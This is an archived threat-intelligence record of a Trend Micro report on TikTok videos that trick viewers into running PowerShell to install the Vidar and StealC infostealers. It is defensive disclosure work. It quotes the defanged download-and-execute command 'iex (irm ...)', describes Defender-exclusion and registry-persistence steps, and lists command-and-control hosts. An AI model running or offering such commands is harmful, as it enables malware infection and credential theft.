{
	"id": "e8934bdd-80ca-4221-9827-0cfd75e89242",
	"created_at": "2026-04-06T00:19:16.492451Z",
	"updated_at": "2026-04-10T13:12:05.852411Z",
	"deleted_at": null,
	"sha1_hash": "865a343ac1dbbd8187d00ab55893ff7ffb38fb70",
	"title": "TikTok Videos Promise Pirated Apps, Deliver Vidar and StealC Infostealers Instead",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1216550,
	"plain_text": "TikTok Videos Promise Pirated Apps, Deliver Vidar and StealC\r\nInfostealers Instead\r\nBy Junestherry Dela Cruz\r\nPublished: 2025-05-21 · Archived: 2026-04-05 23:19:21 UTC\r\nMalware\r\nTrend™ Research uncovered a campaign on TikTok that uses videos to lure victims into downloading information\r\nstealers, a tactic that can be automated using AI tools.\r\nBy: Junestherry Dela Cruz May 21, 2025 Read time: 6 min (1619 words)\r\nSummary:\r\nTrend Research uncovered a new social engineering campaign using TikTok to deliver the Vidar and\r\nStealC information stealers. This attack uses videos (possibly AI-generated) to instruct users to execute\r\nPowerShell commands, which are disguised as software activation steps.\r\nTikTok’s algorithmic reach increases the likelihood of widespread exposure, with one video reaching more\r\nthan half a million views. Businesses can be affected by data exfiltration, credential theft, and potential\r\ncompromise of sensitive systems as a result of this threat.\r\nReinforcing security awareness, especially against AI-generated content, is crucial. Monitoring for unusual\r\ncommand execution involving PowerShell or other system utilities also helps identify malicious activity\r\nearly.\r\nTrend Vision One™ detects and blocks the IOCs discussed in this blog. Trend Vision One customers can\r\nalso access hunting queries, threat insights, and threat intelligence reports to gain rich context and the latest\r\nupdates on this campaign.\r\nTrend Research has uncovered a novel social engineering campaign using TikTok’s vast user base to distribute\r\ninformation-stealing malware, specifically Vidar and StealC. 
Unlike the prevalent Fake CAPTCHA campaign —\r\nwhich relies on fake CAPTCHA pages and clipboard hijacking to trick users into running malicious scripts — this\r\nnew campaign pivots to exploiting the popularity and viral nature of TikTok.\r\nThreat actors are now using TikTok videos that are potentially generated using AI-powered tools to socially\r\nengineer users into executing PowerShell commands under the guise of guiding them to activate legitimate\r\nsoftware or unlock premium features. This campaign highlights how attackers are ready to weaponize whichever\r\nsocial media platforms are currently popular to distribute malware.\r\nThis report details the observed tactics, techniques, and procedures (TTPs), indicators of compromise (IoCs), and\r\nthe potential impact of this trend.\r\nhttps://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html\r\nPage 1 of 7\n\nGoing where the users are: social media-driven deception\r\nThreat actors have long used social media platforms for their attacks, and TikTok is no different. Previous\r\ncampaigns used websites where malicious activity could be identified through the presence of injected JavaScript\r\non compromised landing pages; this TikTok-based campaign used social engineering entirely within video\r\ncontent.\r\nThe vast user base and algorithmic reach of social media platforms provide an ideal delivery mechanism for threat\r\nactors. For attackers, this means broad distribution without the logistical burden of maintaining an infrastructure.\r\nThe use of AI-generated content also elevates these kinds of attacks from isolated incidents to a highly scalable\r\noperation, as these videos can be rapidly produced and tailored to target different user segments.\r\nThe shift of PowerShell from a technical utility to a social engineering tool is also notable. In this campaign,\r\nattackers are using TikTok videos to verbally instruct users into executing malicious commands on their own\r\nsystems. 
The social engineering occurs within the video itself, rather than through detectable code or scripts.\r\nThere is no malicious code present on the platform for security solutions to analyze or block. All actionable\r\ncontent is delivered visually and aurally. Threat actors do this to attempt to evade existing detection mechanisms,\r\nmaking it harder for defenders to detect and disrupt these campaigns.\r\nInitial vector\r\nWe initially identified a TikTok user, @gitallowed, who posted multiple faceless, potentially AI-generated videos.\r\nSince then, we have uncovered additional accounts engaging in similar activity, including @zane.houghton,\r\n@allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771. These accounts are no longer active.\r\nThe videos instruct viewers to run a sequence of commands to purportedly activate legitimate software, such as\r\nWindows OS, Microsoft Office, CapCut, and Spotify. The videos are highly similar, with only minor differences\r\nin camera angles and the download URLs used by PowerShell to fetch the payload. These similarities suggest that the videos\r\nwere likely created through automation. The instructional voice also appears AI-generated, reinforcing the\r\nlikelihood that AI tools are being used to produce these videos.\r\nTo better illustrate the scope and presentation of this campaign, Figure 1 shows the profile page of the TikTok\r\naccount used by the threat actor:\r\nOne particular video, which instructs viewers to run a PowerShell command, has attracted over 20,000 likes and\r\nmore than 100 comments — clear indicators of high user interaction and trust. While the exact view count is not\r\nvisible in the screenshot, TikTok’s analytics reveal that this video has reached nearly 500,000 views. Figure 2\r\ncaptures the video’s popularity and engagement metrics. 
The significant engagement with this video highlights its\r\nreach and the likelihood that many viewers might have followed the instructions.\r\nIn the video, the threat actor presents a series of simple, step-by-step instructions, making the malicious process\r\nappear both legitimate and easy to follow:\r\n1. Press Windows + R\r\n2. Type powershell and press Enter\r\n3. Execute the following command:\r\niex (irm hxxps://allaivo[.]me/spotify)\r\nThese instructions are designed to socially engineer viewers into running a PowerShell command that downloads\r\nand executes a remote script, ultimately compromising their system.\r\nMalicious chain of execution\r\nThe PowerShell command downloads and executes a script (SHA256:\r\nb8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886) from hxxps://allaivo[.]me/spotify.\r\nThe attack chain involves the following:\r\n1. Upon execution, the script first creates hidden directories within the user’s APPDATA and\r\nLOCALAPPDATA folders, adding these locations to the Windows Defender exclusion list to evade\r\ndetection.\r\n2. It then retrieves a secondary payload from hxxps://amssh[.]co/file.exe, which has been identified as either\r\nVidar or StealC malware, and saves it in the hidden folder.\r\n3. The script employs retry logic to ensure that the payload is downloaded successfully, and then launches\r\nthe malware executable as a hidden, elevated process.\r\n4. If the previous process completes successfully, the script downloads an additional PowerShell script from\r\nhxxps://amssh[.]co/script[.]ps1, saves it in the hidden directory, and sets up persistence by creating a\r\nregistry key to execute the script at startup.\r\n5. 
The script deletes temporary folders to minimize forensic traces, while robust error handling ensures the\r\ninfection chain proceeds smoothly.\r\nCommand-and-control infrastructure\r\nThe downloaded Vidar and StealC malware will then reach out to their command-and-control (C\u0026C) servers:\r\nhxxps://steamcommunity[.]com/profiles/76561199846773220 (Vidar)\r\nhxxps://t[.]me/v00rd (Vidar)\r\nhxxp://91[.]92[.]46[.]70/1032c730725d1721[.]php (StealC)\r\nVidar, in particular, abuses legitimate services like Steam and Telegram as Dead Drop Resolvers (DDR)\r\nto conceal its C\u0026C server information. The Steam profile below, for example, contains the actual C\u0026C\r\nIP address in its contents:\r\nFigure 5 summarizes the infection chain of this campaign:\r\nSecurity implications for users and businesses\r\nThe shift to social media as a delivery mechanism for malware requires a corresponding reassessment in defense\r\nstrategies. Traditional security controls that focus on malicious code detection, link scanning, and domain\r\nreputation are less effective against attacks that exploit user trust and obscure malicious intent. Security strategies\r\nmust adopt a more holistic approach that includes social media monitoring, behavioral analysis, and targeted user\r\neducation. Addressing these attack vectors proactively will reduce the risk of mass compromise and help users and\r\nbusinesses alike:\r\nExpanding threat monitoring to social media platforms: Integrating social media threat intelligence feeds can\r\nhelp businesses track emerging campaigns and identify high-engagement content linked to unusual or technical\r\ninstructions. 
Since threat actors often reuse content across multiple platforms, correlating posts across social\r\nmedia networks can reveal interconnected campaigns and even emerging threats.\r\nIncorporating behavioral analysis: With no malicious code embedded, detecting malicious actions relies on\r\nmonitoring user behavior. This includes identifying anomalous activities, such as the execution of system utilities\r\nlike PowerShell. Red flags also include unexpected command execution, direct downloads from unknown URLs,\r\nunauthorized creation of folders, or modifications in security settings.\r\nStrengthening social engineering awareness: Employee training must evolve beyond phishing to address tactics\r\nthat exploit visual and auditory content on social media. Users should be encouraged to scrutinize unsolicited\r\ntechnical instructions, verify the legitimacy of video sources, and report suspicious content, whether on social\r\nmedia, messaging apps, or email. After all, if an offer seems too good to be true, it probably is.\r\nProactive security with Trend Vision One™\r\nTrend Vision One™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber\r\nrisk exposure management, security operations, and robust layered protection. This comprehensive approach helps\r\nyou predict and prevent threats, accelerating proactive security outcomes across your entire digital estate. Backed\r\nby decades of cybersecurity leadership and Trend Cybertron, the industry's first proactive cybersecurity AI, it\r\ndelivers proven results: a 92% reduction in ransomware risk and a 99% reduction in detection time. Security\r\nleaders can benchmark their posture and showcase continuous improvement to stakeholders. 
With Trend Vision\r\nOne, you’re enabled to eliminate security blind spots, focus on what matters most, and elevate security into a\r\nstrategic partner for innovation.\r\nTrend Micro™ Threat Intelligence\r\nTo stay ahead of evolving threats, Trend customers can access Trend Vision One™ Threat Insights, which\r\nprovides the latest insights from Trend Research on emerging threats and threat actors.\r\nTrend Vision One Threat Insights\r\nEmerging Threats: Weaponizing TikTok – AI-Generated Videos Deliver Infostealers at Scale\r\nTrend Vision One Intelligence Reports (IOC Sweeping)\r\nEmerging Social Engineering Campaigns Abusing TikTok for Malware Delivery (Vidar, StealC)\r\nHunting Queries\r\nTrend Vision One Search App\r\nTrend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this\r\nblog post with data in their environment.\r\nExecution of powershell command to download StealC/Vidar\r\neventSubId: 901 and objectRawDataStr:\"iex (irm https://\"\r\nMore hunting queries are available for Trend Vision One customers with Threat Insights Entitlement\r\nenabled.
\r\nIndicators of Compromise (IOCs)\r\nSource: https://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html"
	],
	"report_names": [
		"tiktok-videos-infostealers.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434756,
	"ts_updated_at": 1775826725,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/865a343ac1dbbd8187d00ab55893ff7ffb38fb70.pdf",
		"text": "https://archive.orkl.eu/865a343ac1dbbd8187d00ab55893ff7ffb38fb70.txt",
		"img": "https://archive.orkl.eu/865a343ac1dbbd8187d00ab55893ff7ffb38fb70.jpg"
	}
}